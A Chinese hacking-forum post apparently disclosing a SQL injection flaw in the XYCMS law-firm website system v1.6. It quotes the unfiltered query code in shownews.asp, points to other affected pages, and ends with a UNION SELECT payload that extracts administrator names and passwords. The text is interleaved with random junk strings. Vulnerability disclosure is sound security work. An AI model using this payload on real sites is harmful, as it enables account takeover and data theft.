找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2163|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
+ N6 L$ H& y5 O( k8 j/ p5 Q 0 E5 l3 A( \( [( N1 G" F0 B
淫荡分割线' P0 G' J# ^/ g& |+ {$ f  k
--------------------------------------------------------7 c5 I, ?% V' X, V

0 }+ J& G, n" F* ~; @5 c7 p" U; e审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
/ v, l9 `9 J. {+ r源码地址:http://down.chinaz.com/soft/29233.htm0 ]% t8 _+ p. G$ Z. r+ `6 \
0 T* ]! P5 A8 f5 x6 I
漏洞文件:shownews.asp" J9 p3 M; |% X- {& k) B$ Y
漏洞代码:7-13行
+ t- G8 o3 P0 E) [: a 0 t- F4 j0 F1 p
. F! k, h; z5 }- r8 h
<%   y# M6 i- [4 o2 s" g  a6 i% |- Z
id=request.QueryString("id")
: R6 U# L/ K) K, N. s# c: L7 y    # |8 A* O1 }3 y$ A1 L- _
set snews=server.createobject("adodb.recordset")
/ q& B) v! D! _' q9 Oexec="select * from [news] where id="&id
7 P) k) F4 U5 H2 S) ^$ }. L+ j5 ?/ Wsnews.open exec,conn,1,1/ b) W/ i: C5 X8 ?3 `
%>
. X0 y; Y  t7 a! f" Q+ l
7 y$ b& Q! [& ^5 c' @4 Q. x7 a1 T
. f0 Z) h4 `) m- P' r9 |什么过滤都没有  直造成注入$ y3 b# N, g$ x. M* g/ p2 F0 m

; y' ~" z) ?9 Y% e注入点:http://127.0.0.1:99/shownews.asp?id=xx' g1 e8 q9 M* l6 f' l. Y" R

' m0 I! J, c5 W: n- n- F9 _2 |2 }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
4 A4 q" s. O9 }0 E" Q: u* y5 i 5 [7 I3 H, a0 g8 w) ~7 h

3 h6 ^7 O  j* D: hexp: union select 1,admin,password,4,5,7 from admin_user. P. i6 m  n  n

& e' l3 q3 f  f- ?9 @0 c, [5 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表